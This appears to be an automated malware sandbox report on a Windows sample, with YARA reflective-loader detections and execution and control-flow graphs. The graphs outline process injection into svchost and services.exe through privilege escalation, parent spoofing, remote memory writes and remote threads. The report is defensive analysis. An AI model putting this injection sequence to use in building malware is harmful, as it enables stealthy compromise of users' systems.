                                                    Commandline:C:\Windows\SysWOW64\BackgroundTransferHost.exe
                                                    Imagebase:0x910000
                                                    File size:34'304 bytes
                                                    MD5 hash:0E57CCE96CEE6080C8CB279836EB712C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000009.00000003.2883861414.00000000006B0000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000009.00000002.3294959038.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:03:30:18
                                                    Start date:02/01/2025
                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                    Imagebase:0xaa0000
                                                    File size:107'520 bytes
                                                    MD5 hash:D1053D114847677185F248FF98C3F255
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000A.00000002.3294823523.0000000010273000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000A.00000003.3172524363.0000000002AC0000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:59.1%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:70.8%
                                                      Total number of Nodes:219
                                                      Total number of Limit Nodes:14
                                                      execution_graph 544 7ff6e534104c lstrcmpiW 545 7ff6e5341078 OpenProcess 544->545 546 7ff6e5341102 544->546 545->546 547 7ff6e534108e IsWow64Process 545->547 548 7ff6e53410f9 CloseHandle 547->548 549 7ff6e53410ad QueryFullProcessImageNameW 547->549 548->546 549->548 550 7ff6e53410d0 lstrcmpiW 549->550 550->548 551 7ff6e53410e2 OpenProcess 550->551 551->548 552 7ff6e5341c8b 553 7ff6e5341cb0 lstrcmpiW 552->553 554 7ff6e5341cbd 553->554 555 7ff6e5341cc7 553->555 554->553 554->555 308 7ff6e5341000 313 7ff6e53411cb GetCurrentProcess OpenProcessToken 308->313 314 7ff6e534126d 313->314 315 7ff6e534120b LookupPrivilegeValueW 313->315 436 7ff6e5342102 314->436 316 7ff6e5341226 AdjustTokenPrivileges 315->316 317 7ff6e534125f CloseHandle 315->317 316->317 317->314 321 7ff6e534127f wsprintfW 446 7ff6e534224e GetCurrentProcessId wsprintfW 321->446 326 7ff6e534131a wsprintfW 328 7ff6e534224e 3 API calls 326->328 327 7ff6e53412e0 453 7ff6e5341dde OpenProcessToken 327->453 330 7ff6e534134a 328->330 333 7ff6e53413a1 330->333 335 7ff6e5341371 wsprintfW 330->335 332 7ff6e5341311 CloseHandle 332->326 336 7ff6e5341ce0 12 API calls 333->336 337 7ff6e534224e 3 API calls 335->337 338 7ff6e53413be 336->338 337->330 339 7ff6e53413c3 wsprintfW 338->339 340 7ff6e53413f2 338->340 342 7ff6e534224e 3 API calls 339->342 467 7ff6e5341ed6 lstrcmpA 340->467 344 7ff6e53413eb 342->344 343 7ff6e5341402 345 7ff6e5341627 wsprintfW 343->345 346 7ff6e5341411 wsprintfW 343->346 496 7ff6e534223c 344->496 349 7ff6e534224e 3 API calls 345->349 348 7ff6e534224e 3 API calls 346->348 351 7ff6e5341439 OpenProcess 348->351 364 7ff6e5341657 349->364 352 7ff6e5341459 InitializeProcThreadAttributeList GlobalAlloc 351->352 353 7ff6e534159d 351->353 356 7ff6e5341491 InitializeProcThreadAttributeList UpdateProcThreadAttribute lstrcpyW CreateProcessW 352->356 357 7ff6e53415a4 352->357 359 7ff6e53415f4 wsprintfW 353->359 354 7ff6e5341711 355 7ff6e5341716 wsprintfW 354->355 361 7ff6e534224e 3 API calls 355->361 362 7ff6e534154d 356->362 363 7ff6e53415ab 356->363 365 7ff6e53415e9 CloseHandle 357->365 358 7ff6e534167a OpenProcess 358->364 375 7ff6e5341693 358->375 360 7ff6e534224e 3 API calls 359->360 366 7ff6e534161f 360->366 367 7ff6e5341744 361->367 468 7ff6e5342318 362->468 370 7ff6e53415d7 DeleteProcThreadAttributeList GlobalFree 363->370 364->354 364->355 364->358 365->359 366->344 366->345 367->344 371 7ff6e534174d wsprintfW 367->371 369 7ff6e5342318 20 API calls 369->375 370->365 373 7ff6e534224e 3 API calls 371->373 390 7ff6e5341778 373->390 374 7ff6e5341599 378 7ff6e53415bf CloseHandle CloseHandle 374->378 375->369 376 7ff6e53416f3 CloseHandle 375->376 499 7ff6e5341112 375->499 376->364 377 7ff6e5341a27 380 7ff6e5341112 7 API calls 377->380 378->370 381 7ff6e5341a36 380->381 384 7ff6e5341a3b 381->384 387 7ff6e5341a97 wsprintfW 384->387 385 7ff6e5342318 20 API calls 385->390 386 7ff6e5341823 wsprintfW 389 7ff6e534224e 3 API calls 386->389 388 7ff6e534224e 3 API calls 387->388 392 7ff6e5341ac2 388->392 393 7ff6e5341851 389->393 390->385 390->386 391 7ff6e5341803 CloseHandle 390->391 394 7ff6e5341112 7 API calls 390->394 506 7ff6e5341d55 OpenSCManagerW 390->506 391->390 392->344 395 7ff6e5341aca wsprintfW 392->395 393->344 514 7ff6e5341ed6 lstrcmpA 393->514 394->390 396 7ff6e534224e 3 API calls 395->396 398 7ff6e5341af2 OpenProcess 396->398 400 7ff6e5341b07 398->400 401 7ff6e5341b6d 398->401 399 7ff6e5341867 399->395 402 7ff6e534186f wsprintfW 399->402 404 7ff6e5342318 20 API calls 400->404 403 7ff6e5341b72 wsprintfW 401->403 405 7ff6e534224e 3 API calls 402->405 407 7ff6e534224e 3 API calls 403->407 408 7ff6e5341b4d 404->408 406 7ff6e5341897 PathFindFileNameW 405->406 409 7ff6e5341ce0 12 API calls 406->409 407->344 410 7ff6e5341b62 CloseHandle 408->410 412 7ff6e5341112 7 API calls 408->412 411 7ff6e53418d1 409->411 410->403 411->384 413 7ff6e53418e3 InitializeProcThreadAttributeList GlobalAlloc 411->413 412->410 414 7ff6e534191b InitializeProcThreadAttributeList UpdateProcThreadAttribute lstrcpyW CreateProcessW 413->414 415 7ff6e5341a44 413->415 416 7ff6e53419d7 414->416 417 7ff6e5341a4b 414->417 418 7ff6e5341a8e CloseHandle 415->418 420 7ff6e5342318 20 API calls 416->420 419 7ff6e5341a77 DeleteProcThreadAttributeList GlobalFree 417->419 418->387 419->418 421 7ff6e5341a1d 420->421 422 7ff6e5341a23 421->422 423 7ff6e5341bbd 421->423 424 7ff6e5341a5f CloseHandle CloseHandle 421->424 422->424 425 7ff6e5341112 7 API calls 423->425 424->419 426 7ff6e5341bcc 425->426 426->426 427 7ff6e5342700 lstrcpyW 428 7ff6e5341ce0 12 API calls 427->428 429 7ff6e5342731 OpenProcess 428->429 430 7ff6e534274a VirtualAllocEx 429->430 431 7ff6e5341040 ExitProcess 429->431 432 7ff6e53427f8 CloseHandle 430->432 433 7ff6e5342775 WriteProcessMemory 430->433 432->431 433->432 434 7ff6e534279a VirtualProtectEx 433->434 434->432 435 7ff6e53427c0 CreateRemoteThread CloseHandle 434->435 435->432 515 7ff6e534202e 436->515 440 7ff6e5342156 CreateMutexExW lstrcatW lstrcatW CreateFileW 441 7ff6e53421bc lstrcatW CreateFileMappingW 440->441 442 7ff6e534127a 440->442 441->442 443 7ff6e53421f6 MapViewOfFile 441->443 445 7ff6e53420db GetModuleHandleExW 442->445 443->442 444 7ff6e534221c 443->444 444->442 445->321 447 7ff6e5342285 WriteFile 446->447 449 7ff6e53412ac lstrlenW 446->449 447->449 450 7ff6e5341f62 449->450 451 7ff6e5341ce0 12 API calls 450->451 452 7ff6e53412c8 OpenProcess 451->452 452->326 452->327 454 7ff6e53412f9 453->454 455 7ff6e5341e06 GetTokenInformation 453->455 454->332 461 7ff6e5341ce0 454->461 456 7ff6e5341e38 455->456 457 7ff6e5341eba CloseHandle 455->457 456->457 458 7ff6e5341e42 LookupAccountSidW 456->458 457->454 458->457 459 7ff6e5341e8d 458->459 459->457 460 7ff6e5341eaa lstrcpyW 459->460 460->457 462 7ff6e5341cfe 461->462 463 7ff6e5341d47 462->463 464 7ff6e5341d3e CloseHandle 462->464 531 7ff6e5341bd1 lstrcmpiW 462->531 542 7ff6e5341f2f lstrcmpiW 462->542 463->332 464->463 467->343 469 7ff6e534233c 468->469 470 7ff6e534259c 468->470 469->470 474 7ff6e53423a3 VirtualAllocEx 469->474 471 7ff6e5341593 470->471 472 7ff6e53425d0 wsprintfW 470->472 471->374 471->377 471->378 473 7ff6e534224e 3 API calls 472->473 473->471 474->470 475 7ff6e53423e0 WriteProcessMemory 474->475 476 7ff6e534246a WriteProcessMemory 475->476 494 7ff6e53425a3 475->494 478 7ff6e534248e WriteProcessMemory 476->478 476->494 477 7ff6e53425ad VirtualFreeEx 477->470 479 7ff6e53424b7 WriteProcessMemory 478->479 478->494 479->477 480 7ff6e53424ee VirtualProtectEx 479->480 481 7ff6e534251d 480->481 480->494 482 7ff6e5342616 481->482 483 7ff6e534252d 481->483 484 7ff6e5342628 Wow64GetThreadContext 482->484 485 7ff6e5342676 482->485 482->494 483->477 486 7ff6e5342547 CreateRemoteThread 483->486 487 7ff6e534253f 483->487 488 7ff6e5342647 Wow64SetThreadContext 484->488 493 7ff6e53426be 484->493 490 7ff6e53426e1 ResumeThread WaitForSingleObject 485->490 491 7ff6e534267e GetThreadContext 485->491 489 7ff6e5342580 WaitForSingleObject CloseHandle 486->489 492 7ff6e53426ca 486->492 487->486 487->489 488->493 489->494 490->494 491->493 495 7ff6e534269a SetThreadContext 491->495 492->477 493->477 493->490 494->477 495->493 497 7ff6e5341017 GetModuleHandleW GetModuleFileNameW 496->497 498 7ff6e5342245 CloseHandle 496->498 497->427 498->497 500 7ff6e5341147 Sleep VirtualAllocEx 499->500 501 7ff6e53411b7 500->501 502 7ff6e534116f 500->502 501->375 503 7ff6e5341198 VirtualFreeEx 502->503 504 7ff6e5341177 wsprintfW 502->504 503->500 503->501 505 7ff6e534224e 3 API calls 504->505 505->503 507 7ff6e5341d76 OpenServiceW 506->507 508 7ff6e5341790 OpenProcess 506->508 509 7ff6e5341dc9 507->509 510 7ff6e5341d90 QueryServiceStatusEx 507->510 508->390 513 7ff6e5341dcb CloseServiceHandle 509->513 511 7ff6e5341dba 510->511 512 7ff6e5341dbe CloseServiceHandle 510->512 511->512 512->513 513->508 514->399 516 7ff6e5341ce0 12 API calls 515->516 517 7ff6e5342055 OpenProcess 516->517 518 7ff6e534206c OpenProcessToken 517->518 519 7ff6e53420d0 517->519 520 7ff6e53420b6 518->520 521 7ff6e534208d ExpandEnvironmentStringsForUserW 518->521 526 7ff6e5341f89 GetComputerNameW lstrcatW 519->526 522 7ff6e53420c7 CloseHandle 520->522 523 7ff6e53420a9 lstrlenW 521->523 524 7ff6e53420ba 521->524 522->519 525 7ff6e53420bc CloseHandle 523->525 524->525 525->522 527 7ff6e5342820 526->527 528 7ff6e5341fcf lstrlenW 527->528 529 7ff6e5341fe6 528->529 530 7ff6e5341fee StringFromGUID2 lstrcpyW 529->530 530->440 532 7ff6e5341bf8 OpenProcess 531->532 533 7ff6e5341c30 531->533 532->533 534 7ff6e5341c0e IsWow64Process 532->534 533->462 535 7ff6e5341c27 CloseHandle 534->535 536 7ff6e5341c3f 534->536 535->533 537 7ff6e5341dde 5 API calls 536->537 538 7ff6e5341c52 537->538 538->535 539 7ff6e5341c56 lstrcmpW 538->539 539->535 540 7ff6e5341c68 539->540 540->535 541 7ff6e5341c75 540->541 541->535 543 7ff6e5341f54 542->543 543->462

                                                      Callgraph

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff6e53411cb-7ff6e5341209 GetCurrentProcess OpenProcessToken 1 7ff6e534126d-7ff6e53412de call 7ff6e5342102 call 7ff6e53420db wsprintfW call 7ff6e534224e lstrlenW call 7ff6e5341f62 OpenProcess 0->1 2 7ff6e534120b-7ff6e5341224 LookupPrivilegeValueW 0->2 13 7ff6e534131a-7ff6e5341352 wsprintfW call 7ff6e534224e 1->13 14 7ff6e53412e0-7ff6e53412fb call 7ff6e5341dde 1->14 3 7ff6e5341226-7ff6e5341259 AdjustTokenPrivileges 2->3 4 7ff6e534125f-7ff6e5341267 CloseHandle 2->4 3->4 4->1 21 7ff6e53413a1-7ff6e53413c1 call 7ff6e5341ce0 13->21 22 7ff6e5341354-7ff6e534136c 13->22 19 7ff6e53412fd-7ff6e534130c call 7ff6e5341ce0 14->19 20 7ff6e5341311-7ff6e5341314 CloseHandle 14->20 19->20 20->13 29 7ff6e53413c3-7ff6e53413ed wsprintfW call 7ff6e534224e 21->29 30 7ff6e53413f2-7ff6e534140b call 7ff6e5341ed6 21->30 24 7ff6e5341371-7ff6e534138d wsprintfW call 7ff6e534224e 22->24 28 7ff6e5341392-7ff6e534139f 24->28 28->21 28->24 35 7ff6e5341b9d-7ff6e5341bbc call 7ff6e534223c 29->35 36 7ff6e5341627-7ff6e534165f wsprintfW call 7ff6e534224e 30->36 37 7ff6e5341411-7ff6e5341453 wsprintfW call 7ff6e534224e OpenProcess 30->37 46 7ff6e5341665-7ff6e5341673 36->46 47 7ff6e5341713 36->47 44 7ff6e5341459-7ff6e534148b InitializeProcThreadAttributeList GlobalAlloc 37->44 45 7ff6e534159d-7ff6e53415a2 37->45 49 7ff6e5341491-7ff6e534154b InitializeProcThreadAttributeList UpdateProcThreadAttribute lstrcpyW CreateProcessW 44->49 50 7ff6e53415a4-7ff6e53415a9 44->50 52 7ff6e53415f4-7ff6e534161a wsprintfW call 7ff6e534224e 45->52 51 7ff6e534167a-7ff6e5341691 OpenProcess 46->51 48 7ff6e5341716-7ff6e5341747 wsprintfW call 7ff6e534224e 47->48 48->35 67 7ff6e534174d-7ff6e5341781 wsprintfW call 7ff6e534224e 48->67 55 7ff6e534154d-7ff6e5341597 call 7ff6e5342318 49->55 56 7ff6e53415ab-7ff6e53415b0 49->56 59 7ff6e53415e9-7ff6e53415ee CloseHandle 50->59 57 7ff6e53416f9-7ff6e53416ff 51->57 58 7ff6e5341693-7ff6e53416e3 call 7ff6e5342318 51->58 61 7ff6e534161f-7ff6e5341621 52->61 71 7ff6e5341599-7ff6e534159b 55->71 72 7ff6e53415b2-7ff6e53415b9 55->72 65 7ff6e53415d7-7ff6e53415e3 DeleteProcThreadAttributeList GlobalFree 56->65 57->48 60 7ff6e5341701-7ff6e534170b 57->60 73 7ff6e53416e5-7ff6e53416f0 call 7ff6e5341112 58->73 74 7ff6e53416f3-7ff6e53416f6 CloseHandle 58->74 59->52 60->51 66 7ff6e5341711 60->66 61->35 61->36 65->59 66->48 81 7ff6e5341788-7ff6e53417a2 call 7ff6e5341d55 OpenProcess 67->81 76 7ff6e53415bf-7ff6e53415d5 CloseHandle * 2 71->76 75 7ff6e5341a27-7ff6e5341a36 call 7ff6e5341112 72->75 72->76 73->74 74->57 85 7ff6e5341a3b-7ff6e5341a42 75->85 76->65 86 7ff6e534180c-7ff6e5341814 81->86 87 7ff6e53417a4-7ff6e53417f4 call 7ff6e5342318 81->87 91 7ff6e5341a97-7ff6e5341ac4 wsprintfW call 7ff6e534224e 85->91 89 7ff6e5341816-7ff6e534181d 86->89 90 7ff6e5341823-7ff6e534185c wsprintfW call 7ff6e534224e 86->90 95 7ff6e53417f6-7ff6e5341801 call 7ff6e5341112 87->95 96 7ff6e5341803-7ff6e5341806 CloseHandle 87->96 89->81 89->90 90->35 101 7ff6e5341862-7ff6e5341869 call 7ff6e5341ed6 90->101 91->35 100 7ff6e5341aca-7ff6e5341b05 wsprintfW call 7ff6e534224e OpenProcess 91->100 95->96 96->86 107 7ff6e5341b07-7ff6e5341b53 call 7ff6e5342318 100->107 108 7ff6e5341b6d 100->108 101->100 109 7ff6e534186f-7ff6e53418dd wsprintfW call 7ff6e534224e PathFindFileNameW call 7ff6e5341ce0 101->109 117 7ff6e5341b55-7ff6e5341b5d call 7ff6e5341112 107->117 118 7ff6e5341b62-7ff6e5341b6b CloseHandle 107->118 110 7ff6e5341b72-7ff6e5341b98 wsprintfW call 7ff6e534224e 108->110 109->85 121 7ff6e53418e3-7ff6e5341915 InitializeProcThreadAttributeList GlobalAlloc 109->121 110->35 117->118 118->110 122 7ff6e534191b-7ff6e53419d5 InitializeProcThreadAttributeList UpdateProcThreadAttribute lstrcpyW CreateProcessW 121->122 123 7ff6e5341a44-7ff6e5341a49 121->123 124 7ff6e53419d7-7ff6e5341a21 call 7ff6e5342318 122->124 125 7ff6e5341a4b-7ff6e5341a50 122->125 126 7ff6e5341a8e-7ff6e5341a91 CloseHandle 123->126 130 7ff6e5341a23-7ff6e5341a25 124->130 131 7ff6e5341a52-7ff6e5341a59 124->131 127 7ff6e5341a77-7ff6e5341a89 DeleteProcThreadAttributeList GlobalFree 125->127 126->91 127->126 133 7ff6e5341a5f-7ff6e5341a75 CloseHandle * 2 130->133 132 7ff6e5341bbd-7ff6e5341bc7 call 7ff6e5341112 131->132 131->133 135 7ff6e5341bcc 132->135 133->127 135->135
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wsprintf$Process$CloseHandle$Thread$AttributeProc$Open$ListVirtualWrite$AllocInitializeMemory$CreateFreeGlobal$CurrentFileTokenUpdatelstrcpy$AdjustDeleteFindLookupNameObjectPathPrivilegePrivilegesProtectRemoteSingleSleepValueWaitlstrlen
                                                      • String ID: C:\Windows\System32\services.exe$C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p$SeDebugPrivilege
                                                      • API String ID: 25706242-1126785914
                                                      • Opcode ID: 671d346e829b02091f3ba546a5bde1e68ac5204a7dcab161fa5497929df3df4b
                                                      • Instruction ID: 977f6a8fcc7327c14d4c6c17a358f28533eb6a03858f8a6f1b81c784ec270135
                                                      • Opcode Fuzzy Hash: 671d346e829b02091f3ba546a5bde1e68ac5204a7dcab161fa5497929df3df4b
                                                      • Instruction Fuzzy Hash: 20427332A18B4686EB609F25E4643AA73A1FB95F84F404035D94DC3B95EF3ED90BCB05

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 136 7ff6e5342318-7ff6e5342336 137 7ff6e534233c-7ff6e5342345 136->137 138 7ff6e53425cb-7ff6e53425ce 136->138 137->138 139 7ff6e534234b-7ff6e5342356 137->139 140 7ff6e53425f9-7ff6e534260e 138->140 141 7ff6e53425d0-7ff6e53425f4 wsprintfW call 7ff6e534224e 138->141 139->138 142 7ff6e534235c-7ff6e534239d 139->142 141->140 144 7ff6e534259c-7ff6e53425a1 142->144 145 7ff6e53423a3-7ff6e53423da VirtualAllocEx 142->145 144->138 146 7ff6e53425c6 145->146 147 7ff6e53423e0-7ff6e5342464 WriteProcessMemory 145->147 146->138 148 7ff6e534246a-7ff6e5342488 WriteProcessMemory 147->148 149 7ff6e53425a3-7ff6e53425a8 147->149 148->149 151 7ff6e534248e-7ff6e53424b1 WriteProcessMemory 148->151 150 7ff6e53425ad-7ff6e53425c4 VirtualFreeEx 149->150 150->138 151->149 152 7ff6e53424b7-7ff6e53424e8 WriteProcessMemory 151->152 152->150 153 7ff6e53424ee-7ff6e5342517 VirtualProtectEx 152->153 154 7ff6e534251d-7ff6e5342527 153->154 155 7ff6e534260f-7ff6e5342614 153->155 156 7ff6e5342616-7ff6e534261e 154->156 157 7ff6e534252d-7ff6e5342535 154->157 155->150 158 7ff6e534266c-7ff6e5342671 156->158 159 7ff6e5342620-7ff6e5342626 156->159 157->150 160 7ff6e5342537-7ff6e534253d 157->160 158->150 161 7ff6e5342628-7ff6e5342641 Wow64GetThreadContext 159->161 162 7ff6e5342676-7ff6e534267c 159->162 163 7ff6e5342547-7ff6e534257a CreateRemoteThread 160->163 164 7ff6e534253f-7ff6e5342545 160->164 165 7ff6e5342647-7ff6e534266a Wow64SetThreadContext 161->165 166 7ff6e53426d4 161->166 168 7ff6e53426e1-7ff6e53426f2 ResumeThread WaitForSingleObject 162->168 169 7ff6e534267e-7ff6e5342698 GetThreadContext 162->169 167 7ff6e5342580-7ff6e5342597 WaitForSingleObject CloseHandle 163->167 170 7ff6e53426ca-7ff6e53426cf 163->170 164->163 164->167 173 7ff6e53426be-7ff6e53426c8 165->173 171 7ff6e53426d9-7ff6e53426db 166->171 172 7ff6e53426f8-7ff6e53426fa 167->172 168->172 169->166 174 7ff6e534269a-7ff6e53426b8 SetThreadContext 169->174 170->150 171->150 171->168 172->150 173->171 174->173
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$ContextMemoryProcessWrite$Virtual$ObjectSingleWaitWow64$AllocCloseCreateFreeHandleProtectRemoteResumewsprintf
                                                      • String ID:
                                                      • API String ID: 200714770-0
                                                      • Opcode ID: c3ffab3674fc72676a378aba038bba3a553961f6cb10387b2827a9e3e31fd90d
                                                      • Instruction ID: 5afcb4a790202bc80ccdb9f5a1e0fba0d645d8ad51b6278c2206eebf19221823
                                                      • Opcode Fuzzy Hash: c3ffab3674fc72676a378aba038bba3a553961f6cb10387b2827a9e3e31fd90d
                                                      • Instruction Fuzzy Hash: 71A17062618B8182E7749F11A86036AB7A5FB94FC0F404035EE8DD7B94EF3ED84AD705

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$ProcessVirtual$AllocCreateMemoryOpenProtectRemoteThreadWritelstrcpy
                                                      • String ID: C:\Users\user\Desktop\1731043030539.exe
                                                      • API String ID: 4237685522-894419093
                                                      • Opcode ID: c3060783595219b04aba6df98c4fe00ecae84a5979ac2a9fc1d9e616434945ac
                                                      • Instruction ID: 668bde9955b244de6cc4d4401d12e56a97bf5bb4e6002a41f5e957496dd637dc
                                                      • Opcode Fuzzy Hash: c3060783595219b04aba6df98c4fe00ecae84a5979ac2a9fc1d9e616434945ac
                                                      • Instruction Fuzzy Hash: 5B218E22B1861182FB608F12E8247AA67A5EB85FC4F044134DD4DC7B94EF3ED90BC709

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseHandleOpenWow64lstrcmplstrcmpi
                                                      • String ID: svchost.exe
                                                      • API String ID: 3729492079-3106260013
                                                      • Opcode ID: 33da84bf9f84fb48db419fc368e239f97e1856f174b6db6527ae77252b71042d
                                                      • Instruction ID: 2d77411b93c241b00efbc5ac71defe2a5244fe2b77d54806d9543acc104424f7
                                                      • Opcode Fuzzy Hash: 33da84bf9f84fb48db419fc368e239f97e1856f174b6db6527ae77252b71042d
                                                      • Instruction Fuzzy Hash: 3D117C63B24A4682EAA09F11A8647A96351BB55F84F448034CE0DC7790EF3EAC4BD705

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 02a91111e02b6d17f80dd5bfa3117c19c37dfd37fc44594caa9d929acb6c5c95
                                                      • Instruction ID: e3e7f4aa5a66a0397608b3d0a84ed767771a54fa77100f68a2c1e71b5582806a
                                                      • Opcode Fuzzy Hash: 02a91111e02b6d17f80dd5bfa3117c19c37dfd37fc44594caa9d929acb6c5c95
                                                      • Instruction Fuzzy Hash: 39F0C863B1894901F9759A22682877D42412F96FE0F448330ED3CDA3C6FD3ED807830A

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2066545145.00007FF6E5341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5340000, based on PE: true
                                                      • Associated: 00000000.00000002.2066520375.00007FF6E5340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5343000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066569844.00007FF6E5448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066682591.00007FF6E544A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2066702281.00007FF6E544B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff6e5340000_1731043030539.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFilelstrcat$CloseHandleOpenProcess$EnvironmentExpandMappingMutexStringsTokenUserViewlstrlen
                                                      • String ID: .tmp$\
                                                      • API String ID: 2963383667-2394830877
                                                      • Opcode ID: 8ae599a5a8c4644ae91a768ebe2e177b42768a182a460bb4e6538cdf2216fb1a
                                                      • Instruction ID: 3e4f0dde971c2dd4559ef7f3ab3d40b5b4e1596fed58722f456945bd8288e286
                                                      • Opcode Fuzzy Hash: 8ae599a5a8c4644ae91a768ebe2e177b42768a182a460bb4e6538cdf2216fb1a
